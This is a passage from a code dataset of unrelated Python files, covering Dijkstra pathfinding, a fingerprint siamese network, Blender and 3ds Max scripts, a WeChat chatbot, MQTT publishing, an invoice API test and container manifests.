(current[0]+i, current[1]+j)\n if graph[neighbour]['valid'] == True:\n if i+j == 2:\n dis = math.sqrt(2)\n else:\n dis = 1\n if graph[neighbour]['visited'] == False:\n graph[neighbour]['visited'] = True\t\n num_nodes_visited += 1\t\t\t\t\t\t\t\n graph[neighbour]['parent'] = current\t\t\t\t\t\t\t\t\n graph[neighbour]['distance'] = graph[current]['distance'] + dis\n queue.append(neighbour)\n else:\n if graph[neighbour]['distance'] > graph[current]['distance'] + dis:\n graph[neighbour]['distance'] = graph[current]['distance'] + dis\n graph[neighbour]['parent'] = current\n queue.append(neighbour)\t\t\n path = [(32, 32)]\n parent = (32, 32)\n while parent != source:\n parent = graph[path[len(path)-1]]['parent']\n path.append(parent)\n min_distance = (graph[(32,32)]['distance'])\t\t\n print(\"Total Number of Nodes Visited:\", num_nodes_visited)\t\n return(min_distance, path)\n\nif __name__ == \"__main__\":\n g = create_graph()\n points = [x for x in g.keys() if not (g[x]['valid'])]\n x = [i[0] for i in points]\n y = [i[1] for i in points]\n plt.scatter(x,y) \n min_distance, path = dijkstra(g, (2,2))\n print(\"Minimum Distance:\", min_distance)\n x = [i[0] for i in path]\n y = [i[1] for i in path]\n plt.plot(x,y, 'r')\n plt.show()","sub_path":"dij.py","file_name":"dij.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"314129484","text":"#the plan is to train on Databases/FVC2006/DB_1A and then test on Databases/FVC2006/DB_1B \n#this version uses a fully connected layer, no convolutions.\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nimport numpy as np\nnp.random.seed(1337) # for reproducibility\n\nimport random\nfrom keras.datasets import mnist\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Dropout, Input, Lambda\nfrom keras.optimizers import Adam\nfrom keras.constraints import maxnorm\nfrom keras import backend as K\nfrom sklearn.metrics import roc_curve, auc\nimport matplotlib.pyplot as plt\nimport scipy\nfrom scipy import misc\n\n\n#same thing as cosine similarity\ndef euclidean_distance(vects):\n x, y = vects\n return K.sqrt(K.sum(K.square(x - y), axis=1, keepdims=True))\n\n#no clue what this does\ndef eucl_dist_output_shape(shapes):\n shape1, shape2 = shapes\n return (shape1[0], 1)\n\n#some type of loss function i think. 
figure out why they used this specific one later?\ndef contrastive_loss(y_true, y_pred):\n '''Contrastive loss from Hadsell-et-al.'06\n http://yann.lecun.com/exdb/publis/pdf/hadsell-chopra-lecun-06.pdf\n '''\n margin = 1\n return K.mean(y_true * K.square(y_pred) + (1 - y_true) * K.square(K.maximum(margin - y_pred, 0)))\n\n\n\n#the fingerprint version\ndef create_training_pairs(): \n '''Positive and negative pair creation.\n Alternates between positive and negative pairs.\n '''\n\n pairs = []\n labels = []\n\n for i in range(1, 141):\n for first in range(1, 13):\n for second in range(first, 13):\n firstName = 'Databases/FVC2006/DB1_A/'\n secondName = 'Databases/FVC2006/DB1_A/'\n firstName += str(i) + '_' + str(first) + '.bmp'\n secondName += str(i) + '_' + str(second) + '.bmp'\n\n im1 = misc.imread(firstName)\n im2 = misc.imread(secondName)\n im1 = im1.reshape(9216)\n im2 = im2.reshape(9216)\n pairs += [[im1, im2]]\n\n\n dn = random.randrange(1, 11)\n while dn == i:\n dn = random.randrange(1, 11)\n notMatchingName = 'Databases/FVC2006/DB1_A/' + str(dn) + '_' + str(second) + '.bmp'\n notMatching = misc.imread(notMatchingName)\n notMatching = notMatching.reshape(9216)\n pairs += [[im1, notMatching]]\n labels += [1, 0]\n return np.array(pairs), np.array(labels)\n\n\ndef create_testing_pairs(): \n '''Positive and negative pair creation.\n Alternates between positive and negative pairs.\n '''\n\n pairs = []\n labels = []\n\n for i in range(1, 11):\n for first in range(1, 13):\n for second in range(first, 13):\n firstName = 'Databases/FVC2006/DB1_B/'\n secondName = 'Databases/FVC2006/DB1_B/'\n firstName += str(i) + '_' + str(first) + '.bmp'\n secondName += str(i) + '_' + str(second) + '.bmp'\n\n im1 = misc.imread(firstName)\n im2 = misc.imread(secondName)\n im1 = im1.reshape(9216)\n im2 = im2.reshape(9216)\n pairs += [[im1, im2]]\n\n dn = random.randrange(1, 11)\n while dn == i:\n dn = random.randrange(1, 11)\n notMatchingName = 'Databases/FVC2006/DB1_B/' + str(dn) + '_' + str(second) + '.bmp'\n notMatching = misc.imread(notMatchingName)\n notMatching = notMatching.reshape(9216)\n pairs += [[im1, notMatching]]\n labels += [1, 0]\n\n return np.array(pairs), np.array(labels)\n\n\n\n\n \n\n\n#define the shared network. apparently 128 is good for gpus\ndef create_base_network(input_dim):\n '''Base network to be shared (eq. to feature extraction).\n '''\n seq = Sequential()\n seq.add(Dropout(0.2, input_shape=(input_dim,)))\n seq.add(Dense(128, activation='relu', W_constraint=maxnorm(1)))\n seq.add(Dropout(0.2))\n\n return seq\n\n\ndef compute_accuracy(predictions, labels):\n '''Compute classification accuracy with a fixed threshold on distances.\n '''\n return np.mean(labels == (predictions.ravel() > 0.5))\n\n# actual fingerprint part\n\n\n\n\ntr_pairs, tr_y = create_training_pairs()\nte_pairs, te_y = create_testing_pairs()\ntr_pairs = tr_pairs.astype('float32')\nte_pairs = te_pairs.astype('float32')\ntr_pairs /= 255\nte_pairs /= 255\n\ninput_dim = 9216\nnb_epoch = 15\n\n\n# network definition\nbase_network = create_base_network(input_dim)\n\n#uh, where do you even find the input documentation lmao. 
they didn't use this input thing in previous examples...\ninput_a = Input(shape=(input_dim,))\ninput_b = Input(shape=(input_dim,))\n\n# because we re-use the same instance `base_network`,\n# the weights of the network\n# will be shared across the two branches\n\n# SEEMS IMPORTANT\nprocessed_a = base_network(input_a)\nprocessed_b = base_network(input_b)\n#print (processed_a == processed_b) \n#wtf that printed out false ^ why do they share weights like so...whatever. not worth my time...\n\n#not a python lambda. this is a layer that performs a function (in this case, euclidean_distance) on the input\n#[processed_a, processed_b] is a dict to be fed into euclidean_distance\n# output_shape specifies the entire shape as a function of the input shape: output_shape = eucl_dist_output_shape(input_shape)\ndistance = Lambda(euclidean_distance, output_shape=eucl_dist_output_shape)([processed_a, processed_b])\n\n\npredictions = Dense(1, init='normal', activation='sigmoid')(distance)\n\nmodel = Model(input=[input_a, input_b], output=predictions)\n\nadam = Adam(lr=0.00001)\nmodel.compile(loss='binary_crossentropy', optimizer=adam, metrics=['accuracy'])\n\nhistory = model.fit([tr_pairs[:, 0], tr_pairs[:, 1]], tr_y,\n validation_data=([te_pairs[:, 0], te_pairs[:, 1]], te_y),\n batch_size=128,\n nb_epoch=nb_epoch)\n\n\n# compute final accuracy on training and test sets\npred = model.predict([tr_pairs[:, 0], tr_pairs[:, 1]])\ntr_acc = compute_accuracy(pred, tr_y) #compute_accuracy is a function defined above. fixed threshold = 0.5 --> if prediction > thresh then it says yes.\npred = model.predict([te_pairs[:, 0], te_pairs[:, 1]])\nte_acc = compute_accuracy(pred, te_y)\n\n#roc curve for testing\n#need to reshape pred for roc curve\nte_fpr, te_tpr, thresh = roc_curve(te_y, pred.ravel())\nte_auc = auc(te_fpr, te_tpr)\n\nplt.figure()\nlw = 2\nplt.plot(te_fpr, te_tpr, color='darkorange',\n lw=lw, label='ROC curve (area = %0.2f)' % te_auc)\nplt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\nplt.xlim([0.0, 1.0])\nplt.ylim([0.0, 1.05])\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\nplt.title('Receiver operating characteristic example - training')\nplt.legend(loc=\"lower right\")\nplt.show()\n\n#loss and accuracy history plot\n# list all data in history\nprint(history.history.keys())\n# summarize history for accuracy\nplt.plot(history.history['acc'])\nplt.plot(history.history['val_acc'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n# summarize history for loss\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n\n\n#saving weights for later\n#model.save_weights('fingerprint_siamese_graph_ver_1_weights.h5')\n\n\n'''\n#looking to see if weights are shared or not\nfor layer in model.layers:\n weights = layer.get_weights()\n print(\"layer weight\")\n print(weights)\n print(\"layer norm\")\n print(np.linalg.norm(weights))\n'''\n\n\nprint('* Accuracy on training set: %0.2f%%' % (100 * tr_acc))\nprint('* Accuracy on test set: %0.2f%%' % (100 * te_acc))\n","sub_path":"fingerprint_siamese_graph_ver_1.py","file_name":"fingerprint_siamese_graph_ver_1.py","file_ext":"py","file_size_in_byte":7843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"499019560","text":"import MaxPlus\nimport math\n\nclass 
Quaternion_toEulerianAngle():\n def __init__(self, x, y, z, w):\n self.x = x\n self.y = y\n self.z = z\n self.w = w\n\n def X(self):\n t0 = +2.0 * (self.w * self.x + self.y * self.z)\n t1 = +1.0 - 2.0 * (self.x * self.x + pow(self.y, 2))\n X = math.degrees(math.atan2(t0, t1))\n return X\n\n def Y(self):\n t2 = +2.0 * (self.w * self.y - self.z * self.x)\n t2 = 1 if t2 > 1 else t2\n t2 = -1 if t2 < -1 else t2\n Y = math.degrees(math.asin(t2))\n return Y\n\n def Z(self):\n t3 = +2.0 * (self.w * self.z + self.x * self.y)\n t4 = +1.0 - 2.0 * (pow(self.y, 2) + self.z * self.z)\n Z = math.degrees(math.atan2(t3, t4))\n return Z\n\ndef SetRotation(obj, x, y, z):\n MaxPlus.INode.GetINodeByName(obj.Name) #selected\n\n getAngles = Quaternion_toEulerianAngle(obj.GetWorldRotation().X,\n obj.GetWorldRotation().Y,\n obj.GetWorldRotation().Z,\n obj.GetWorldRotation().W)\n\n rotateValue_X = MaxPlus.Quat(MaxPlus.AngAxis(1, 0, 0, math.radians(x*-1 - getAngles.X())))\n rotateValue_Y = MaxPlus.Quat(MaxPlus.AngAxis(0, 1, 0, math.radians(y*-1 - getAngles.Y())))\n rotateValue_Z = MaxPlus.Quat(MaxPlus.AngAxis(0, 0, 1, math.radians(z*-1 - getAngles.Z())))\n\n\n obj.SetWorldRotation(rotateValue_X)\n obj.SetWorldRotation(rotateValue_Y)\n obj.SetWorldRotation(rotateValue_Z)\n\nfor obj in MaxPlus.SelectionManager.Nodes:\n\n SetRotation(obj, 0, -50, 0)\n\n\n # if obj.Name == 'camera':\n # getAngle = Quaternion_toEulerianAngle(obj.GetWorldRotation().X, obj.GetWorldRotation().Y, obj.GetWorldRotation().Z, obj.GetWorldRotation().W)\n #\n # translateValue = MaxPlus.Point3(0, 0, 0)\n #\n # obj.SetWorldPosition(translateValue)\n #\n\n\n","sub_path":"CamCleaner.py","file_name":"CamCleaner.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"311429736","text":"n = int(input())\r\na = n\r\ns = 0\r\nwhile(n>0):\r\n temp = n % 10\r\n c = 1\r\n for i in range(1,temp+1):\r\n c = c * i\r\n s = s + c\r\n n = n // 10\r\nif (s == a):\r\n print('strong number')\r\nelse:\r\n print('not strong number')\r\n \r\n","sub_path":"strong number.py","file_name":"strong number.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"350998326","text":"from __future__ import print_function\n\nimport logging\nimport numpy as np\nimport timeit\n\nfrom OCC.Core.BRep import BRep_Builder, BRep_Tool\nfrom OCC.Core.BRepTools import breptools_Read\nfrom OCC.Core.Geom import Geom_Line, Geom_TrimmedCurve\nfrom OCC.Core.GeomConvert import geomconvert_SurfaceToBSplineSurface\nfrom OCC.Core.GeomAPI import GeomAPI_ExtremaCurveSurface\nfrom OCC.Core.gp import gp_Pnt, gp_Dir\nfrom OCC.Core.TopoDS import TopoDS_Shape, topods_Face\nfrom OCC.Display.SimpleGui import init_display\n\nlogging.getLogger('matplotlib').setLevel(logging.ERROR)\n\n\ndef trimmed_curve_from_points(points=[[0.9, 0.9, 0.9]], vecs=[[1, 1, 0]]):\n \"\"\"\n Create line objects from points/vectors\n \"\"\"\n return [Geom_TrimmedCurve(Geom_Line(gp_Pnt(*p), gp_Dir(*vec)), 0., 8.)\n for p, vec in zip(points, vecs)]\n\n\ndef show_objects(objs=[], wireframe=False):\n \"\"\"\n Display pythonOCC geometry objects in simple viewer\n\n Parameters\n ----------\n objs : list\n List of pythonOCC objects to be displayed\n wireframe : bool\n Set to true to plot wireframe instead of surface\n \"\"\"\n display, start_display, add_menu, add_function_to_menu = init_display(size=(1920, 1080))\n display.EraseAll()\n if wireframe:\n 
display.SetModeWireFrame()\n for obj in objs:\n display.DisplayShape(obj, update=True)\n start_display()\n\n\ndef read_brep(filename):\n \"\"\"\n Retrieve BSpline surface from brep file\n \"\"\"\n output_shape = TopoDS_Shape()\n builder = BRep_Builder()\n breptools_Read(output_shape, filename, builder)\n brep_face = BRep_Tool.Surface(topods_Face(output_shape))\n return geomconvert_SurfaceToBSplineSurface(brep_face)\n\n\ndef generate_intersection_vectors(c, nxu=100, nxv=10):\n \"\"\"\n Generate the intersection vectors\n \"\"\"\n x = np.linspace(0.01*c, 1.99*c, nxu)\n vec_phi = np.linspace(0, 2*np.pi, nxv)\n points = np.pad(x[:, None], ((0, 0), (0, 2)), mode='constant')\n vecs = np.column_stack([np.zeros(nxv), np.cos(vec_phi), np.sin(vec_phi)])\n points, vecs = np.broadcast_arrays(points[:, None, :], vecs[None, ...])\n return points.reshape(-1, 3), vecs.reshape(-1, 3)\n\n\ndef intersect(occsurf, occvecs, v, show_occ=False):\n '''\n Perform intersection\n '''\n occpts = []\n xpts = []\n fails = []\n times = []\n for curve, v_1, v_2 in zip(occvecs, *v):\n failure = [np.nan, np.nan, np.nan]\n t = timeit.timeit(lambda: GeomAPI_ExtremaCurveSurface(curve, occsurf, 0., 1., 0., 1., 0., 1.),\n number=1)\n x = GeomAPI_ExtremaCurveSurface(curve, occsurf, 0., 6., 0., 1., 0., 1.)\n w, _, _ = x.LowerDistanceParameters()\n times.append(t)\n vec = curve.Value(w)\n if x.LowerDistance() > 1e-4:\n failure = np.array([vec.X(), vec.Y(), vec.Z()])\n occpts.append(vec)\n xpts.append(np.array([vec.X(), vec.Y(), vec.Z()]))\n fails.append(failure)\n\n if show_occ:\n show_objects([occsurf] + occvecs + occpts)\n\n print('----------')\n print('Time for intersections', sum(times))\n\n xpts = np.array(xpts)\n fails = np.array(fails)\n isfailure = np.any(~np.isnan(fails), axis=1)\n fails = fails[isfailure]\n\n return times, isfailure, xpts\n\n\ndef write_vtk_output(surface, times, isfailure, xpts, pts, vecs):\n import vtkhelpers\n from occhelpers.geom import OCCBSplineSurface\n\n OCCBSplineSurface.from_raw_object(surface).to_interpol_bspline_surface().to_vtk().write('surf')\n vtklines = vtkhelpers.multiple_lines_from_grids(np.dstack((pts,\n pts + vecs * 8)))\n\n data = {'id': np.arange(len(pts)),\n 'failure': isfailure.astype(int).ravel(),\n 'runtime': np.array(times),\n }\n\n xverts = vtkhelpers.vertices_from_grids(xpts.T)\n xverts.point_data.update(data)\n xverts.write('xpoints')\n\n vtklines.cell_data.update(data)\n vtklines.write('lines')\n\n\nif __name__ == \"__main__\":\n import pytest\n pytest.main(['test_intersection_example.py', '-sv'])\n","sub_path":"intersection_example.py","file_name":"intersection_example.py","file_ext":"py","file_size_in_byte":4067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"538352146","text":"import paho.mqtt.client as mqtt\n\n# 1. MQTT 클라이언트 객체 인스턴스화\nclient = mqtt.Client()\n\ntry:\n # 2. 브로커 연결\n client.connect(\"localhost\")\n\n # 3. 
토픽 메시지 발행\n client.publish(\"iot/home2/greet\", \"Hello World!\")\n client.loop(2)\n\nexcept Exception as err:\n print('에러 : %s'%err)","sub_path":"MQTT.python/pub.py","file_name":"pub.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"392062270","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.http.response import HttpResponse, HttpResponseBadRequest\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom wechat_sdk import WechatBasic\nfrom wechat_sdk.exceptions import ParseError\nfrom wechat_sdk.messages import TextMessage\nfrom service.models import userdialog\nimport time\nfrom service.tuling import sendtuling\n\nWECHAT_TOKEN = 'mahhhraspberrypi'\nAppID = 'wx0a69695d0ecfc941'\nAppSecret = ''\n\n# 实例化 WechatBasic\nwechat_instance = WechatBasic(\n token=WECHAT_TOKEN,\n appid=AppID,\n appsecret=AppSecret\n)\n\n\n@csrf_exempt\ndef index(request):\n if request.method == 'GET':\n # 检验合法性\n # 从 request 中提取基本信息 (signature, timestamp, nonce, xml)\n signature = request.GET.get('signature')\n timestamp = request.GET.get('timestamp')\n nonce = request.GET.get('nonce')\n\n if not wechat_instance.check_signature(\n signature=signature, timestamp=timestamp, nonce=nonce):\n return HttpResponseBadRequest('Verify Failed')\n\n return HttpResponse(\n request.GET.get('echostr', ''), content_type=\"text/plain\")\n\n # 解析本次请求的 XML 数据\n try:\n wechat_instance.parse_data(data=request.body)\n except ParseError:\n return HttpResponseBadRequest('Invalid XML Data')\n\n # 获取解析好的微信请求信息\n message = wechat_instance.get_message()\n # 获取来源用户OpenID\n userid = message.source\n # 会话超时判断\n userid = str(userid)\n try:\n dialog = userdialog.objects.get(userid=userid)\n except:\n dialog = userdialog.objects.create(userid = userid,lasttime = int(time.time()),tulingflag = 0,jokingstep = 0)\n if (int(time.time()) - dialog.lasttime) > 180:\n dialog.tulingflag = 0\n dialog.jokingstep = 0\n else:\n pass\n response = None\n # 关注事件的默认回复\n if message.type == 'subscribe':\n response = wechat_instance.response_text(\n content=(\n '感谢您的关注!\\n回复【功能】两个字查看支持的功能'\n ))\n # 文字内容的回复\n elif isinstance(message, TextMessage):\n # 当前会话内容\n content = message.content.strip()\n reply_text = (\n '好委屈,我没有听懂哦😝'\n )\n if dialog.tulingflag == 1:\n if content == '退出':\n dialog.tulingflag = 0\n reply_text = (\n '已退出聊天模式'\n )\n else:\n tuling_chat = sendtuling(content,str(userid))\n reply_text = (\n tuling_chat\n )\n else:\n if content == '功能':\n reply_text = (\n '目前支持的功能:\\n1、回复【二八轮动】可以搜索数据,查看最新指数情况\\n'\n '2、回复【陪我聊天】,查天气,陪聊天,讲故事,你的小伙伴【小小某】无所不能!'\n '还有更多好玩和实用的功能正在开发中哦 ^_^'\n # '\\n【<a href=\"https://www.mahhh.imwork.net\">马某个人主页</a>】'\n )\n elif content == '二八轮动':\n reply_text = (\n '实时观测深沪300指数与创业板指数变化\\n'\n '还有更多好玩和实用的功能正在开发中哦 ^_^\\n'\n '【<a href=\"http://www.mahh.xin/lundong\">点我查看</a>】'\n '\\n【<a href=\"http://39.106.8.229/lundong\">备用地址</a>】'\n # '\\n【<a href=\"https://www.douban.com/note/551791040/\">了解更多</a>】'\n )\n elif content == '陪我聊天':\n dialog.tulingflag = 1\n reply_text = (\n '人工智能的【小小某】已开启陪聊模式😎'\n '\\n如果您想要退出聊天模式,请回复【退出】'\n '\\n(本功能基于<a href=\"http://www.tuling123.com/\">图灵机器人</a>开发)'\n '\\n还有更多好玩和实用的功能正在开发中哦 ^_^'\n )\n else:\n tuling_chat = sendtuling(content, str(userid))\n reply_text = (\n tuling_chat\n )\n\n # elif content.endswith('教程'):\n # reply_text = '您要找的教程如下:'\n\n response = wechat_instance.response_text(content=reply_text)\n # 非文字内容回复\n else:\n response = wechat_instance.response_text(\n 
content=(\n '哎呀,我现在只会读文字啊😥'\n )\n )\n dialog.lasttime = int(time.time())\n dialog.save()\n return HttpResponse(response, content_type=\"application/xml\")\n","sub_path":"service/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"249541128","text":"import os\nimport bpy\nfrom bpy.app.handlers import persistent\n\nbl_info = {\n \"name\": \"OBJ Export on Save\",\n \"blender\": (2, 81, 0),\n \"category\": \"Process\",\n}\n\ntargetDir = '/path/to/p5live/models/'\n\n\n@persistent\ndef export_as_obj(dummy):\n filename = os.path.splitext(os.path.basename(bpy.data.filepath))\n targetFilePath = targetDir + filename[0] + '.obj'\n print('exporting obj to:', targetFilePath)\n\n bpy.ops.export_scene.obj(\n filepath=targetFilePath,\n check_existing=False,\n # axis_forward='-Z',\n # axis_up='Y',\n # use_selection=True,\n # use_animation=False,\n # use_mesh_modifiers=True,\n # use_edges=True,\n # use_smooth_groups=False,\n # use_smooth_groups_bitflags=False,\n # use_normals=True,\n # use_uvs=True,\n # use_materials=True,\n # use_triangles=False,\n # use_nurbs=False,\n # use_vertex_groups=False,\n # use_blen_objects=True,\n # group_by_object=False,\n # group_by_material=False,\n # keep_vertex_order=False,\n # global_scale=1,\n # path_mode='AUTO'\n )\n\n\ndef register():\n print(\"Hello World\")\n if not export_as_obj in bpy.app.handlers.save_post:\n bpy.app.handlers.save_post.append(export_as_obj)\n\n\ndef unregister():\n print(\"Goodbye World\")\n if export_as_obj in bpy.app.handlers.save_post:\n bpy.app.handlers.save_post.remove(export_as_obj)\n\n\n# This allows you to run the script directly from Blender's Text editor\n# to test the add-on without having to install it.\nif __name__ == \"__main__\":\n register()\n","sub_path":"Blender-Export-To-OBJ-Addon.py","file_name":"Blender-Export-To-OBJ-Addon.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"570318048","text":"#-*- coding:utf-8 -*-\n__author__ = 'sunweiwei002'\nfrom common.getconfig import GetConfig\nfrom common.verify import Verify\nfrom nose.plugins.attrib import attr\nfrom common.requestslib import RequestsLib\nfrom assistant.hhub3.order import Order\nfrom common.getdate import GetDate\n\n@attr('addfororder','hhub3')\nclass Testaddfororder():\n @classmethod\n def setup_class(self):\n date = GetDate()\n self.hotelId = \"2000014\"\n self.order = Order(date.get_date(0), date.get_date(1), hotelId=self.hotelId)\n self.orderId = self.order.get_orderId()\n self.conf = GetConfig()\n self.verity=Verify()\n self.url = self.conf.get_conf_value(\"hhub3\",\"url\")+r\"api/Invoice/AddForOrder\"\n self.requestslib = RequestsLib()\n\n @classmethod\n def teardown_class(self):\n self.order.cancel_order(self.orderId)\n pass\n\n def testaddfororder_status(self):\n u\"添加发票到订单\"\n params = dict()\n params['hotelId'] = self.hotelId\n params['orderId'] = self.orderId\n params['Invoices.Title'] ='盟广信息技术(上海)有限公司'\n params['Invoices.Content'] ='吃喝玩乐'\n params['Invoices.Type'] ='0'\n params['Invoices.IsDefault'] ='true'\n params['Invoices.IsVat'] ='true'\n params['Invoices.TaxpayerCode'] = '12345687890'\n params['Invoices.UnifiedSocialCreditCode'] = '1234567890'\n params['Invoices.CompanyAddress'] = '紫秀路100号'\n params['Invoices.PhoneNumber'] = '02180236666'\n params['Invoices.CompanyBank'] = '工商银行'\n params['Invoices.CompanyBankAccountNumber'] = 
'1234567890'\n response = self.requestslib.send_request_by_alltoken('post', self.url, request_body=params)\n self.verity.by_status(response, 200)","sub_path":"testproject/hhub3/invoice/addfororder/testaddfororder.py","file_name":"testaddfororder.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"563264670","text":"import nltk\nimport string\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom nltk.stem.porter import PorterStemmer\n\npath = '/opt/datacourse/data/parts'\ntoken_dict = {}\nstemmer = PorterStemmer()\n\n\ndef stem_tokens(tokens, stemmer):\n stemmed = []\n for item in tokens:\n stemmed.append(stemmer.stem(item))\n return stemmed\n\ndef tokenize(text):\n tokens = nltk.word_tokenize(text)\n stems = stem_tokens(tokens, stemmer)\n return stems\n\nvectorizer = TfidfVectorizer(tokenizer=tokenize, stop_words='english')\n\n#this can take some time\n\ndef preprocess(text):\n lowers = text.lower()\n no_punctuation = lowers.translate(None, string.punctuation)\n return no_punctuation\n\n\ndef similarity(text1, text2):\n text1 = preprocess(text1)\n text2 = preprocess(text2)\n tfidf = vectorizer.fit_transform([text1, text2])\n return ((tfidf * tfidf.T).A)[0,1]\n\n# calculate the value of novelty of single sentence of s1 compared with the array of sentences ss.\ndef novelty(s1, ss):\n max = 0\n for s in ss:\n sim = similarity(s, s1)\n if sim > max:\n max = sim\n return 1 - max\n","sub_path":"Novelty.py","file_name":"Novelty.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"359387783","text":"import forca\nimport adivinhacao\n\ndef escolhe_jogo():\n print(\"*********************************\")\n print(\"******* Escolha Seu Jogo ********\")\n print(\"*********************************\")\n\n print(\"(1) Forca (2) Adivinhação\")\n\n jogo = int(input(\"Qual jogo: \"))\n\n if(jogo == 1):\n print(\"Jogando Forca\")\n forca.jogar_forca()\n else:\n print(\"Jogando Advinhação\")\n adivinhacao.jogar_adivinhacao()\n\nif(__name__== \"__main__\"):\n escolhe_jogo()\n","sub_path":"jogos.py","file_name":"jogos.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"222773696","text":"from toposort import toposort_flatten\nfrom .cached_property import cached_property\nimport os\nimport json\n\n\ndef trim_interface_name(name):\n if len(name) >= 15:\n return name[0:15]\n return name\n\n\nclass Container:\n def __init__(self, name):\n self.name = name\n\n @classmethod\n def all(cls):\n def exists(name):\n return name == os.path.basename(name) \\\n and os.path.exists(os.path.join(\"/var/lib/machines\", name, 'fs'))\n\n machines = sorted(os.listdir('/var/lib/machines'))\n machines = list(filter(exists, machines))\n return (cls(name) for name in machines)\n\n @cached_property\n def manifest(self):\n try:\n with open('/var/lib/machines/{}/manifest'.format(self.name)) as f:\n return json.loads(f.read())\n except FileNotFoundError:\n return {\n \"kostkaVersion\": \"0.0.2\",\n \"name\": self.name,\n \"dependencies\": [\n {\"imageName\": \"debian-jessie\"}\n ],\n \"networks\": [\n {\"type\": \"bridge\",\n \"bridge\": \"br-lan\",\n \"host\": trim_interface_name(\"vb-{}-lan\".format(self.name)),\n \"guest\": \"host0\"},\n ]\n }\n\n @manifest.setter\n def manifest(self, manifest):\n with 
open('/var/lib/machines/{}/manifest'.format(self.name), 'w') as f:\n f.write(json.dumps(manifest, indent=2))\n return manifest\n\n @property\n def dependencies(self):\n return list(dependency['imageName'] for dependency in self.manifest['dependencies'])\n\n @dependencies.setter\n def dependencies(self, dependencies):\n manifest = self.manifest\n manifest['dependencies'] = list({\"imageName\": name} for name in dependencies)\n self.manifest = manifest\n\n def mount_lowerdirs(self):\n # First, build a dependency graph in order to avoid duplicate entries\n dependencies = {}\n pending_deps = set(self.dependencies)\n while len(pending_deps) > 0:\n name = pending_deps.pop()\n if name not in dependencies:\n dependencies[name] = set(Container(name).dependencies)\n pending_deps |= dependencies[name]\n\n # Then sort it topologically. The list is reversed, because overlayfs\n # will check the mounts in order they are given, so the base fs has to\n # be the last one.\n dependencies = reversed(list(toposort_flatten(dependencies)))\n return ':'.join('/var/lib/machines/{}/overlay.fs'.format(dep) for dep in dependencies)\n\n @property\n def networks(self):\n return self.manifest.get('networks', [\n {\"type\": \"bridge\",\n \"bridge\": \"br-lan\",\n \"host\": trim_interface_name(\"vb-{}-lan\".format(self.name)),\n \"guest\": \"host0\"\n },\n ])\n\n @property\n def bridges(self):\n return list(filter(lambda net: net['type'] == 'bridge', self.networks))\n\n def add_network(self, bridge, host=None, guest=None, mac=None):\n manifest = self.manifest\n if not host:\n host = \"vb-{}-{}\".format(self.name, bridge.split('-', 1)[1])\n if not guest:\n guest = \"host-{}\".format(bridge.split('-', 1)[1])\n\n if mac:\n mac = '{}:{}:{}:{}:{}:{}'.format(mac[0:2], mac[2:4], mac[4:6], mac[6:8], mac[8:10], mac[10:12])\n\n if any(filter(lambda net: net['host'] == host, self.networks)):\n raise ValueError('Duplicate host interface name: ' + host)\n\n if any(filter(lambda net: net['guest'] == guest, self.networks)):\n raise ValueError('Duplicate container interface name: ' + guest)\n\n if any(filter(lambda net: net.get('guest_address', '') == mac, self.networks)):\n raise ValueError('Duplicate guest mac address: ' + mac)\n\n if len(host) > 15:\n raise ValueError('Host interface name {} is {} bytes too long.'.format(host, len(host) - 15))\n\n if len(guest) > 15:\n raise ValueError('Container interface name {} is {} bytes too long.'.format(guest, len(guest) - 15))\n\n manifest['networks'].append({\n \"type\": \"bridge\",\n \"bridge\": bridge,\n \"host\": host,\n \"guest\": guest,\n })\n\n if mac:\n manifest['networks'][-1]['guest_address'] = mac\n\n self.manifest = manifest\n","sub_path":"kostka/container.py","file_name":"container.py","file_ext":"py","file_size_in_byte":4457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"317498487","text":"# Wrong Answer\n# Python 3\n\n# Enter your code here. Read input from STDIN. 
